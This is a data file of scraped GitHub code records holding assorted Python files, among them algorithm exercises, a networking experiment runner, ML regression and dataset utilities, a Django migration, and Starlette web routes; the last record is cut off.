min(A[i], my_list[dp[j]+1])\n\n            dp[i] = max(dp[i], dp[j]+1)\nans = max(dp)\nprint(ans)\n# print(*my_list[1:ans+1])\nresult = []\nidx = ans\nfor i in range(n-1, -1, -1):\n    if dp[i] == idx:\n        result.append(A[i])\n        idx -= 1\nprint(*result[::-1])","repo_name":"YOONJAHYUN/Python","sub_path":"BOJ/14002.py","file_name":"14002.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} {"seq_id":"2012105375","text":"#!/usr/bin/python3\n\n# echo \"For instance http://79.141.8.227:8000/xpfiles\"\n# echo \"or http://153.16.49.120:8000/xpfiles\"\n\nimport linux\nimport XPTest\nimport glob\nimport argparse\nimport sys\nimport os\nimport apt\nimport configparser\nimport lispmob\n#from configparser import ExtendedInterpolation\n\nglobal config\n\n\n\n# modes= {\n# \"install\" : \n# \"compile\" : \n# \"load\" : \n# \"unload\" : \"rmmod \"+lig_module+ \" 2>&1\" \n\n# }\n\n\nconfig = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation() )\n\ndef check_config( config_file):\n\t# TODO\n\t# check for pyroute, lispmob etc...\n\treturn False\n\n\t#if not os.path.is_file( config_file ):\n\n\n\n\n\n\ndef run_tests(args):\n\n\t#if args.run_tests:\n\n\t# TODO check test exists\n\tfor test_name in args.run_tests:\n\t\t# instantiate a test \n\t\tmembers = inspect.getmembers(sys.modules[\"XPTest\"], inspect.isclass)\n\t\tif not test_name in members:\n\t\t\tprint(\"Invalid test :\", test_name)\n\t\t\tcontinue\n\n\t\ttest = test_name();\n\t\tprint (\"Pre-launch operations\");\n\t\tif not test.prepare():\n\t\t\tprint ( \"Test '\"+ test.name + \"' failed\")\n\t\t\tcontinue;\n\n\t\ttest.launch()\n\n\n\n# config.set(\"DEFAULT\", \"MainDir\", os.path.realpath( os.path.dirname(__file__)) )\n\n# first need to compile module\nconfig.read(\"config.ini\")\n\n\n#available_tests = glob.glob(\"./tests/*.py\")\navailable_tests =('TCPWithoutLISP', 'MPTCPWithLisp','MPTCPWithoutLISP')\n\n# run tests\nparser = argparse.ArgumentParser(\n\t#description='Handle mptcp kernel module in charge of converting kernel requests into netlink requests '\n\tdescription='Will run the tests you specify'\n\t)\n\n#there must be at most one ?\n# parser.add_argument('mode', choices=(\n# \t\t\t\t\t\t\t\t'download',\n# \t\t\t\t\t\t\t\t'compile',\n# \t\t\t\t\t\t\t\t'tests',\n# \t\t\t\t\t\t\t\t'daemon', \n# \t\t\t\t\t\t\t\t'module',\n# 
\t\t\t\t\t\t\t\t'kernel'\n# \t\t\t\t\t\t\t\t'mptcp'\n# \t\t\t\t\t\t\t\t), \n# \t\t\t\t\thelp=\"Choose what mode you wanna control\")\n\nsubparsers = parser.add_subparsers(dest=\"mode\", help='sub-command help')\ndaemon_parser = subparsers.add_parser('daemon',help='daemon help')\ndaemon_parser.add_argument('action', choices=('compile','load','unload'), action=\"store\")\ndaemon_parser.set_defaults(func=handle_daemon)\n\nmodule_parser = subparsers.add_parser('module', help='module help')\nmodule_parser.add_argument('action', choices=('compile','load','unload') )\nmodule_parser.set_defaults(func=handle_module)\n\ntests_parser = subparsers.add_parser('tests', help='tests help')\ntests_parser.add_argument('tests',nargs=\"*\")\ntests_parser.set_defaults(func=run_tests)\n\n# all params get passed to mptcp.py ?\nmptcp_parser = subparsers.add_parser('mptcp', help='tests help')\nmptcp_parser.add_argument('params',nargs=\"*\")\n\nlispmob_parser = subparsers.add_parser('lispmob', help='tests help')\nlispmob_parser.add_argument('action', choices=('compile','load','unload') )\nlispmob_parser.set_defaults(func=handle_lispmob)\n#mptcp_parser = subparsers.add_argument('') \n#parser.add_argument('--download',action=\"store_true\", help=\"will try to install everything necessary, to the extent of download and compiling from git\")\n#parser.add_argument('--compile-module',action=\"store_true\", help=\"recompile everything and install it\")\n#parser.add_argument('--module', choices=('load','unload') , action='store' , help = \"Use it to load or unload kernel module\" )\n\n#parser.add_argument('--run-tests',action=\"store_true\", help=\"Generate the random files that will be downloaded during the XP\")\n#parser.add_argument('--module', choices=('load','unload') ,action='store', dest='action' )\n\n\nparser.add_argument('--prepare',action=\"store_true\", help=\"Check the environment, recompile everything and install it\")\nparser.add_argument('--generate-files',action=\"store_true\", help=\"Generate the random files that will be downloaded during the XP\")\n\n# subparser for run-test command\n# we then need to know remote rloc and local rloc\n#parser_a = subparsers.add_parser('run-tests', help='a help')\n\n#parser.add_argument('--run-tests', nargs=\"+\", choices=available_tests , help=\"List of tests taken from the \\\"tests\\\" subfolder\");\n\n\n\n#nargs=argparse.REMAINDER\nargs = parser.parse_args( sys.argv[1:] )\n\nprint ( \"Chosen mode: \", args.mode );\nargs.func( args )\n\n\n# TO DEBUG\n#print(args)\n\n# if args.mode == \"module\":\n# \thandle_module( args.mode )\n#if args.daemon.action:\n\t# module = linux.InstalledModule( config['module']['name'])\n\t# if args.module == \"load\":\n\t# \tmodule.load()\n\t# else:\n\t# \tmodule.unload()\n\t# print (\"Module loaded \", module.is_loaded())\n\n# if args.download:\n# \tprint('Downloading complementary files')\n# \t# install libnl for\n# \t# subprocess.check_call(\"git clone git://git.infradead.org/users/tgr/libnl.git libnl\",shell=True)\n# \t# ./autogen.sh\n# \t# check swig and source-highlight/ascii docs are installed \n# \t# ./configure\n# \t# cd python \n# \t# python setup.py build\n# \t# sudo python setup.py install\n# \t# install custom lispmob\n# \t#\"git clone \"\n# \tprint('Finished')\n\n\n# compile module and install it\n# should generate files as well\nif args.prepare:\n\tkernel = linux.KernelSource( config['kernel']['src']);\n\t\n\tkernel.compile_module( config['module']['src'])\n\tkernel.install_module( config['module']['src'])\n\n\t# module = 
linux.InstalledModule( config['module']['name'])\n\t# module.load();\n\t# print (\"Module loaded \", module.is_loaded() )\n\t# #module.unload();\n\t# print (\"Module loaded \", module.is_loaded() )\n\n\n# will launch tests\n\n\n\n# uname -r\n\n# TODO need to set $MainDir\n#config.set()\n\n\n\n# will recompile module just to be sure\n# need to check kernel version against module version\n","repo_name":"teto/xp_couplage","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13559132173","text":"#search\r\nimport state\r\nimport frontier\r\n\r\ndef search(n):\r\n s=state.create(n)\r\n # print(s)\r\n f=frontier.create(s)\r\n while not frontier.is_empty(f):\r\n s=frontier.remove(f)\r\n if state.is_target(s):\r\n return [s, f[1], f[3]]\r\n ns=state.get_next(s)\r\n for i in ns:\r\n frontier.insert(f,i)\r\n return 0\r\n\r\n# print(search(3))\r\n\r\ndef avg_search(times, n):\r\n sum_depth = 0\r\n sum_items = 0\r\n\r\n for i in range(times):\r\n _, items, depth = search(n)\r\n sum_depth += depth\r\n sum_items += items\r\n\r\n avg_depth = sum_depth / times\r\n avg_items = sum_items / times\r\n return avg_depth, avg_items\r\n\r\ndef avg_search_threading(times, n):\r\n from multiprocessing.pool import ThreadPool\r\n\r\n sum_depth = 0\r\n sum_items = 0\r\n\r\n with ThreadPool(8) as p:\r\n result = p.map(search, [n] * times)\r\n for i in result:\r\n _, items, depth = i\r\n sum_depth += depth\r\n sum_items += items\r\n\r\n avg_depth = sum_depth / times\r\n avg_items = sum_items / times\r\n return avg_depth, avg_items\r\n \r\n\r\nprint(\"--- Starting average search of 3 ---\")\r\ndepth3, items3 = avg_search_threading(100, 3)\r\nprint(\"Average depth\", depth3)\r\nprint(\"Average items\", items3)\r\n\r\nprint(\"--- Starting average search of 4 ---\")\r\ndepth4, items4 = avg_search_threading(100, 4)\r\nprint(\"Average depth\", depth4)\r\nprint(\"Average items\", items4)\r\n\r\n","repo_name":"AvielBerko/IntroToAI","sub_path":"תרגיל 1 - A star/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12446424319","text":"# web user id and password\n\nimport urllib.request\nimport urllib.parse\n\nurl = 'http://localhost:8080/cgi-bin/web_user.py'\nvalues = {'name' : 'Michael Foord',\n 'location' : 'Northampton',\n 'language' : 'Python' }\n\ndata = urllib.parse.urlencode(values)\ndata = data.encode('ascii') # data should be bytes\nreq = urllib.request.Request(url, data)\nwith urllib.request.urlopen(req) as response:\n the_page = response.read()\n print(the_page)\n\n","repo_name":"amirkhan1092/Batch2023-24","sub_path":"Programs/Sequential Programs/web_user.py","file_name":"web_user.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"6"} +{"seq_id":"21986842996","text":"\"\"\"Fixer for 'g.throw(E(V).with_traceback(T))' -> 'g.throw(E, V, T)'\"\"\"\n\nfrom crosswind import fixer_base\nfrom crosswind.fixer_util import Comma\nfrom crosswind.pgen2 import token\nfrom crosswind.pytree import Leaf, Node\n\n\nclass FixThrow(fixer_base.BaseFix):\n\n PATTERN = \"\"\"\n power< any trailer< '.' 'throw' >\n trailer< '(' args=power< exc=any trailer< '(' val=any* ')' >\n trailer< '.' 
'with_traceback' > trailer< '(' trc=any ')' > > ')' > >\n    \"\"\"\n\n    def transform(self, node, results):\n        syms = self.syms\n        exc, val, trc = (results[\"exc\"], results[\"val\"], results[\"trc\"])\n        val = val[0] if val else Leaf(token.NAME, \"None\")\n        val.prefix = trc.prefix = \" \"\n        kids = [exc.clone(), Comma(), val.clone(), Comma(), trc.clone()]\n        args = results[\"args\"]\n        args.children = kids\n","repo_name":"ryanwersal/crosswind","sub_path":"fixer_suites/three_to_two/fixes/fix_throw.py","file_name":"fix_throw.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"} {"seq_id":"42926774086","text":"\"\"\"\nhttps://leetcode-cn.com/explore/interview/card/top-interview-quesitons-in-2018/261/before-you-start/1107/\nGiven an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.\n\nYou may assume that the array is non-empty and that the majority element always exists in the array.\n\nExample 1:\n\nInput: [3,2,3]\nOutput: 3\nExample 2:\n\nInput: [2,2,1,1,1,2,2]\nOutput: 2\n\n--------------\nThinking:\n    Boyer-Moore majority vote: it fully exploits the condition that one element appears more than n/2 times in the array, giving O(n) time complexity.\n    Starting from the first number, set count=1; add 1 on seeing the same number and subtract 1 on a different one. When count drops to 0, restart counting from the next number. Whatever number remains at the end is the majority element.\n\"\"\"\nclass Solution(object):\n    def majorityElement(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        major = nums[0]\n        count = 1\n        n = len(nums)\n        del nums[0]\n        for i in nums:\n            if count == 0:\n                count += 1\n                major = i\n            elif major == i:\n                count += 1\n            else:\n                count -= 1\n        return major\n    ","repo_name":"ppalantir/axjingWorks","sub_path":"algorithm_note/getOffer/majorty_element.py","file_name":"majorty_element.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} {"seq_id":"20351285218","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('payments', '0002_auto_20161231_0914'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='landpurchasepayment',\n            name='buyer_email',\n            field=models.EmailField(default='', max_length=254),\n            preserve_default=False,\n        ),\n    ]\n","repo_name":"njerucyrus/smartland","sub_path":"payments/migrations/0003_landpurchasepayment_buyer_email.py","file_name":"0003_landpurchasepayment_buyer_email.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"24646636869","text":"# USAGE\n#python 01_find_chars.py -i characters/bi.png -f y\n\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\n\nprint(\"01_find_chars.py --images images/imageName.png --saveFile y or n\")\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", help = \"Where is the image file? path/filename\")\nap.add_argument(\"-f\", \"--saveFile\", help = \"Save contour points to file? 
y or n\")\nargs = vars(ap.parse_args())\noutFilename = args[\"image\"].split(\"/\")\n\nimage = cv2.imread(args[\"image\"])\n\n# find all the 'black' shapes in the image\nlower = np.array([0, 0, 0])\nupper = np.array([15, 15, 15])\nshapeMask = cv2.inRange(image, lower, upper)\n\ncnts = cv2.findContours(shapeMask.copy(), cv2.RETR_EXTERNAL,\n\tcv2.CHAIN_APPROX_SIMPLE)\ncnts = imutils.grab_contours(cnts)\n\nprint(\"I found {} black shapes\".format(len(cnts)))\n#cv2.imshow(\"Mask\", shapeMask)\n\n# loop over the contours\nk=1\nfor c in cnts:\n\tcv2.drawContours(image, [c], -1, (0, 255, 0), 2)\n\tcv2.imshow(\"Image\", image)\n\tcv2.waitKey(0)\n\tif args[\"saveFile\"] == \"y\":\n\t\tfilename = \"radicals/processed/\"+outFilename[1][:-4]+str(k)\n\t\tnp.save(filename, c)\n\t\tk+=1\n\n","repo_name":"NelsonPython/OpenCV-detects-Chinese-Radicals","sub_path":"01_find_chars.py","file_name":"01_find_chars.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"70472631547","text":"import os, sys\n\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\nfrom scipy.interpolate import griddata\n\nimport glob\nimport numpy as np\nimport cv2\nimport torch\n\nfrom dataloader.utils import azimuthalAverage\nfrom PIL import Image, ImageEnhance\nimport copy\n\n\"\"\"\n    Class for making a dual (spatial and spectrum) image dataset\n\"\"\"\nclass SingleRGBStreamDataset(Dataset):\n    def __init__(self, path, image_size, transform=None, shuffle=True):\n        self.transform = transform\n        self.image_size =image_size\n        self.shuffle = shuffle\n        self.data_path = path\n        # print(\"sample: \", self.data_path[:10])\n        # print(\"len: \", len(self.data_path))\n        np.random.shuffle(self.data_path)\n        self.indexes = range(len(self.data_path))\n        self.on_epoch_end()\n\n    def on_epoch_end(self):\n        'Updates indexes after each epoch'\n        if self.shuffle == True:\n            np.random.shuffle(self.data_path)\n    \n    def __getitem__(self, index):\n        img = cv2.imread(self.data_path[index])\n        img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n        img = cv2.resize(img,(self.image_size,self.image_size))\n        \n        # Convert to PIL Image instance and transform spatial image\n        PIL_img = Image.fromarray(img)\n        if self.transform is not None:\n            PIL_img = self.transform(PIL_img)\n        \n        ############ Make FFT image ############\n        # Make label\n        y = 0\n        if '0_real' in self.data_path[index]:\n            y = 0\n        elif '1_df' in self.data_path[index] or '1_f2f' in self.data_path[index] or '1_fs' in self.data_path[index] or '1_nt' in self.data_path[index] or '1_fake' in self.data_path[index]:\n            y = 1\n        return PIL_img, y\n\n    def __len__(self):\n        return int(len(self.data_path))","repo_name":"phuc180155/GraduationThesis","sub_path":"my_thesis/forensics/dl_technique/dataloader/simple_dataset.py","file_name":"simple_dataset.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} {"seq_id":"12351618031","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 22 20:49:36 2022\n\n@author: th\n\"\"\"\n\nimport numpy as np\n\n# import ray\n\nimport random\nfrom sklearn.linear_model import LinearRegression \nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom sklearn.preprocessing import StandardScaler as SS\n\n\ndef batch_split_x(nodes_cp, full_index, ii, chip_ids):\n    nodes_cp = np.array(nodes_cp)\n    test_x = nodes_cp[ii]\n    train_idx=np.setxor1d(full_index, chip_ids)\n    train_x = 
nodes_cp[train_idx]\n if(len(train_x[0].shape)==1):\n train_concat = flatten_list_1d(train_x)\n else:\n train_concat = []\n for jj, x in enumerate(train_x):\n if(jj==0):\n train_concat = x\n else:\n train_concat= np.vstack((train_concat, x))\n \n return train_concat, test_x\n\n\n\n\ndef flatten_list_1d(act_ratio):\n ph = np.empty((1,0))\n ph = np.squeeze(ph)\n \n for entry in act_ratio:\n ph = np.concatenate((ph, entry))\n \n return ph\n\n\ndef standardscaler_transform(sc_feat_pure):\n scaler = SS()\n scaler.fit(sc_feat_pure)\n transformed=scaler.transform(sc_feat_pure)\n \n return transformed, scaler\n\n\ndef average_mse_batch_x(target_frs, y_scale, chip_ids):\n mse_vec = []\n mse_train= []\n just_ave = []\n \n mae_vec = []\n mae_train= []\n just_ave_mae = []\n \n for ii in range(len(target_frs)):\n target_cp = np.copy(target_frs)\n full_index= np.arange(len(target_frs))\n\n \n test_x = target_cp[ii]\n #also take out configs belonging to the same chip \n same_chip = np.where(np.array(chip_ids) == chip_ids[ii])[0]\n train_idx=np.setxor1d(full_index, same_chip)\n train_x = target_cp[train_idx]\n \n # concat all train set\n train_x = flatten_list_1d(train_x)\n \n #standardize\n if(y_scale):\n train_x, train_scaler_x= standardscaler_transform(train_x.reshape(-1,1))\n test_x = train_scaler_x.transform(test_x.reshape(-1,1)) \n \n \n \n mean_train = np.mean(train_x)\n mse_loss = np.mean((test_x-mean_train)**2)\n mse_loss_tr = np.mean((train_x-mean_train)**2)\n mse_vec.append(mse_loss)\n mse_train.append(mse_loss_tr)\n mean_test = np.mean(test_x)\n mse_pure = np.mean(np.square(test_x-mean_test))\n just_ave.append(mse_pure)\n \n #mae\n mae_loss = np.mean(np.abs(test_x-mean_train))\n mae_loss_tr = np.mean(np.abs(train_x-mean_train))\n mae_vec.append(mae_loss)\n mae_train.append(mae_loss_tr)\n \n mean_test = np.mean(test_x)\n mae_pure = np.mean(np.abs(test_x-mean_test))\n just_ave_mae.append(mae_pure)\n \n ave_result = dict()\n ave_result['mse_test']= np.array(mse_vec)\n ave_result['mse_train']= np.array(mse_train)\n ave_result['mae_test']= np.array(mae_vec)\n ave_result['mae_train']= np.array(mae_train)\n \n \n return ave_result\n\n\ndef linear_reg_batch_x(nodes, target_frs, iter_n, y_scale, chip_ids):\n np.random.seed(42)\n random.seed(42)\n full_index= np.arange(len(target_frs))\n per_network = []\n for ii in range(len(target_frs)):\n \n ls_vec=[]\n lin_coef_vec=[]\n mse_vec=[]\n mae_vec=[]\n y_pred_vec = []\n ls_vec_t=[]\n mse_vec_t=[]\n mae_vec_t=[]\n #y_pred_vec_t = []\n #get target y first \n target_cp = np.copy(target_frs)\n full_index= np.arange(len(target_frs))\n test_y = target_cp[ii]\n #get idx from same chips \n same_chip = np.where(np.array(chip_ids) == chip_ids[ii])[0]\n \n train_idx=np.setxor1d(full_index, same_chip) # got rid of it\n \n train_y = target_cp[train_idx]\n train_y = flatten_list_1d(train_y)\n \n # make x \n nodes_cp = np.copy(nodes)\n train_x, test_x = batch_split_x(nodes_cp, full_index, ii, same_chip)\n \n train_x, train_scaler_x= standardscaler_transform(train_x)\n test_x = train_scaler_x.transform(test_x) \n \n if(y_scale):\n train_y, train_scaler_y=standardscaler_transform(train_y.reshape(-1,1))\n test_y = train_scaler_y.transform(test_y.reshape(-1,1)) \n \n \n for iter_ in range(iter_n):\n \n reg = LinearRegression().fit(train_x, train_y)\n linear_score = reg.score(train_x, train_y)\n linear_coef = reg.coef_\n y_pred=reg.predict(train_x)\n mseloss = np.mean(((train_y - y_pred) ** 2))\n maeloss = np.mean(np.abs(train_y-y_pred))\n \n ls_vec.append(linear_score)\n 
lin_coef_vec.append(linear_coef)\n mse_vec.append(mseloss)\n y_pred_vec.append(y_pred)\n mae_vec.append(maeloss)\n \n y_pred = reg.predict(test_x)\n mseloss= np.mean(((test_y - y_pred) ** 2))\n maeloss = np.mean(np.abs(test_y-y_pred))\n \n ls_vec_t.append(reg.score(test_x, test_y))\n mse_vec_t.append(mseloss)\n mae_vec_t.append(maeloss)\n # y_pred_vec_t.append(y_pred)\n \n\n \n \n lin_result = dict()\n lin_result['R-sq']=np.array(ls_vec)\n lin_result['slope_coef']=np.array(lin_coef_vec)\n lin_result['mse_train']=np.array(mse_vec)\n lin_result['mae_train'] = np.array(mae_vec)\n lin_result['pred']=y_pred_vec\n lin_result['R-sq test']= np.array(ls_vec_t)\n lin_result['mse_test'] = np.array(mse_vec_t)\n lin_result['mae_test'] = np.array(mae_vec_t)\n per_network.append(lin_result)\n \n return per_network\n\n\ndef rf_reg_batch_x(nodes, target_frs, iter_n, y_scale, chip_ids, params):\n np.random.seed(42)\n random.seed(42)\n full_index= np.arange(len(target_frs))\n per_network = []\n for ii in range(len(target_frs)):\n \n ls_vec = []\n mse_vec= []\n mae_vec=[]\n y_pred_vec=[]\n feat_imp_vec = []\n mse_test_vec=[]\n mae_test_vec=[]\n #y_pred_vec_t = []\n #get target y first \n \n \n #get target y first \n target_cp = np.copy(target_frs)\n full_index= np.arange(len(target_frs))\n test_y = target_cp[ii]\n #get idx from same chips \n same_chip = np.where(np.array(chip_ids) == chip_ids[ii])[0]\n train_idx=np.setxor1d(full_index, same_chip) # got rid of it\n \n train_y = target_cp[train_idx]\n train_y = flatten_list_1d(train_y)\n \n # make x \n nodes_cp = np.copy(nodes)\n train_x, test_x = batch_split_x(nodes_cp, full_index, ii, same_chip)\n train_x, train_scaler_x=standardscaler_transform(train_x)\n test_x = train_scaler_x.transform(test_x) \n \n \n \n if(y_scale):\n train_y, train_scaler_y=standardscaler_transform(train_y.reshape(-1,1))\n test_y = train_scaler_y.transform(test_y.reshape(-1,1)) \n train_y = np.squeeze(train_y)\n test_y = np.squeeze(test_y)\n \n for iter_ in range(iter_n):\n \n if(type(params)==bool):\n reg = RandomForestRegressor(\n n_estimators = 200,\n max_features = 'sqrt', \n min_samples_leaf = 5, \n min_samples_split = 2,\n )\n else:\n reg = RandomForestRegressor(n_estimators = params[ii]['rf__n_estimators'], \n # max_depth= params['max_depth'], \n max_features = params[ii]['rf__max_features'], \n min_samples_leaf = params[ii]['rf__min_samples_leaf'], \n min_samples_split = params[ii]['rf__min_samples_split'],\n )\n \n reg.fit(train_x, train_y)\n y_pred = reg.predict(train_x)\n mseloss = np.mean(((train_y - y_pred) ** 2))\n maeloss = np.mean(np.abs(train_y-y_pred))\n y_pred = reg.predict(test_x)\n mseloss_test = np.mean(((test_y - y_pred) ** 2))\n maeloss_test = np.mean(np.abs(test_y-y_pred)) \n feat_imp = reg.feature_importances_\n \n ls_vec.append(reg.score(train_x, train_y))\n mse_vec.append(mseloss)\n mae_vec.append(maeloss)\n y_pred_vec.append(y_pred)\n feat_imp_vec.append(feat_imp)\n mse_test_vec.append(mseloss_test)\n mae_test_vec.append(maeloss_test)\n \n\n \n#load_lr_model =pickle.load(open(filename, 'rb'))\n \n rf_result = dict()\n rf_result['reg_score']=np.array(ls_vec)\n rf_result['mse_train']=np.array(mse_vec)\n rf_result['y_pred']=np.array(y_pred_vec)\n rf_result['feat_importance']=feat_imp_vec\n rf_result['mse_test'] = np.array(mse_test_vec)\n rf_result['mae_train'] = np.array(mae_vec)\n rf_result['mae_test'] = np.array(mae_test_vec)\n per_network.append(rf_result)\n \n return 
per_network","repo_name":"arahangua/gnn_prediction_sn","sub_path":"pred_models/non_gnn_models.py","file_name":"non_gnn_models.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"34409053058","text":"import calendar\nimport time\nfrom sqlalchemy.dialects.postgresql import UUID\nfrom app.main.models.user import User\nfrom app.main.models.brands import Brand\n\nfrom app.main import db\n\n\nclass BrandContent(db.Model):\n __tablename__ = \"brand_articles\"\n\n id = db.Column(UUID(as_uuid=True), primary_key=True)\n title = db.Column(db.String(1000))\n description = db.Column(db.String(1000))\n user_id = db.Column(UUID(as_uuid=True), db.ForeignKey(\"users.id\"), nullable=True)\n brand_id = db.Column(UUID(as_uuid=True), db.ForeignKey(\"brands.id\"), nullable=True)\n canonical_link = db.Column(db.String(1000), nullable=False)\n image_link = db.Column(db.String(1000))\n content_type = db.Column(db.String(40))\n favicon_icon_link = db.Column(db.String(1000), nullable=True)\n updated_at = db.Column(db.BIGINT, nullable=False, default=calendar.timegm(time.gmtime()))\n created_at = db.Column(db.BIGINT, nullable=False, default=calendar.timegm(time.gmtime()))\n site_name = db.Column(db.String(200))\n tags = db.Column(db.PickleType,nullable=True)\n","repo_name":"deepakarya09/cureas_reads","sub_path":"app/main/models/brand_articles.py","file_name":"brand_articles.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"34892308986","text":"\nimport copy\nimport generals\nimport numpy as np\n\n\nDIRECTIONS = [\n (0, 1),\n (0, -1),\n (1, 0),\n (-1, 0),\n]\nOBSTACLES = [generals.MOUNTAIN, generals.OBSTACLE]\n\n\ndef get_all_moves(state):\n moves = []\n for y in range(state['rows']):\n for x in range(state['cols']):\n moves += get_moves(state, y, x)\n return moves\n\n\ndef get_moves(state, y, x):\n if (state['tile_grid'][y][x] != state['player_index']\n or state['army_grid'][y][x] < 2):\n return []\n\n moves = []\n for dy, dx in DIRECTIONS:\n by, bx = y + dy, x + dx\n if (0 <= by < state['rows']\n and 0 <= bx < state['cols']\n and state['tile_grid'][by][bx] not in OBSTACLES):\n moves.append((y, x, by, bx))\n return moves\n\n\ndef apply_move(state, move):\n state = copy.deepcopy(state)\n pi = state['player_index']\n ag = state['army_grid'] = np.asarray(state['army_grid'])\n tg = state['tile_grid'] = np.asarray(state['tile_grid'])\n if move is not None:\n ay, ax, by, bx = move\n assert abs(ay - by) + abs(ax - bx) == 1\n\n if (tg[ay, ax] == pi\n and tg[by, bx] not in OBSTACLES\n and ag[ay, ax] > 1):\n n = ag[ay, ax] - 1\n\n # neutral city or enemy tile\n if (((by, bx) in state['cities'] and tg[by, bx] == generals.EMPTY)\n or (tg[by, bx] >= 0 and tg[by, bx] != pi)):\n if n > ag[by, bx]:\n m = ag[by, bx]\n state['armies'][pi] -= m\n state['lands'][pi] += 1\n if tg[by, bx] >= 0:\n state['armies'][tg[by, bx]] -= m\n state['lands'][tg[by, bx]] -= 1\n ag[ay, ax] -= n\n ag[by, bx] = n - m\n tg[by, bx] = pi\n else:\n state['armies'][pi] -= n\n if tg[by, bx] >= 0:\n state['armies'][tg[by, bx]] -= n\n ag[ay, ax] -= n\n ag[by, bx] -= n\n\n # friendly tile\n elif tg[by, bx] == pi:\n ag[ay, ax] -= n\n ag[by, bx] += n\n\n # empty tile\n elif tg[by, bx] == generals.EMPTY:\n state['lands'][pi] += 1\n ag[ay, ax] -= n\n ag[by, bx] += n\n tg[by, bx] = pi\n\n else:\n raise AssertionError()\n\n # generate armies\n state['turn'] += 1\n if 
state['turn'] % 25 == 0:\n        for p in np.unique(tg):\n            if p >= 0:\n                state['armies'][p] += (tg == p).sum()\n        ag[tg >= 0] += 1\n    else:\n        for y, x in state['generals']:\n            if y >= 0 and x >= 0:\n                state['armies'][tg[y, x]] += 1\n                ag[y, x] += 1\n        for y, x in state['cities']:\n            if tg[y, x] >= 0:\n                state['armies'][tg[y, x]] += 1\n                ag[y, x] += 1\n\n    for i, (y, x) in enumerate(state['generals']):\n        if y >= 0 and x >= 0 and tg[y, x] != i:\n            state['alives'][i] = False\n\n    return state\n","repo_name":"EklipZgit/generals-ai","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} {"seq_id":"1206124937","text":"from starlette.routing import Host, Mount, Route, WebSocketRoute\n\nfrom . import endpoints, legacy, middleware, resources, settings\nfrom .reload import hotreload\nfrom .sitemap import sitemap\n\nroutes = [\n    Host(\n        \"florimondmanca.com\",\n        app=legacy.DomainRedirect(\"florimond.dev\"),\n        name=\"legacy:dot_com\",\n    ),\n    Host(\n        \"blog.florimondmanca.com\",\n        app=legacy.DomainRedirect(\"blog.florimond.dev\"),\n        name=\"legacy:blog_dot_com\",\n    ),\n    Host(\n        \"blog.florimond.dev\",\n        app=legacy.DomainRedirect(\"florimond.dev\", root_path=\"/blog\"),\n        name=\"legacy:blog_dot_dev\",\n    ),\n    Route(\"/\", endpoints.home),\n    Route(\"/error/\", endpoints.error),\n    Route(\"/blog/\", endpoints.legacy_blog_home, name=\"legacy:blog_home\"),\n    Route(\"/blog/{permalink:path}/\", endpoints.RenderPage, name=\"page\"),\n    Mount(settings.STATIC_ROOT, resources.static, name=\"static\"),\n    # These files need to be exposed at the root, not '/static/'.\n    Route(\"/favicon.ico\", resources.static, name=\"favicon\"),\n    Route(\"/robots.txt\", resources.static, name=\"robots\"),\n    Route(\"/sitemap.xml\", sitemap, name=\"sitemap\"),\n    Route(\n        \"/feed.rss\",\n        # Make sure clients always receive the correct MIME type for the RSS feed,\n        # as the content type Starlette guesses may vary across operating systems.\n        middleware.PatchHeadersMiddleware(\n            resources.static, headers={\"content-type\": \"application/rss+xml\"}\n        ),\n        name=\"feed-rss\",\n    ),\n]\n\nif settings.DEBUG:  # pragma: no cover\n    routes += [WebSocketRoute(\"/hot-reload\", hotreload, name=\"hot-reload\")]\n","repo_name":"1akshat/www","sub_path":"server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} {"seq_id":"70613777787","text":"import requests\nimport datetime\nimport os\nimport base64\nimport json\nfrom dotenv import load_dotenv\n\nload_dotenv()\nAPI_KEY = os.getenv(\"API_KEY\")\nENCODED_API_KEY = base64.b64encode(API_KEY.encode()).decode()\nheaders = {\n    'Authorization': f'Basic 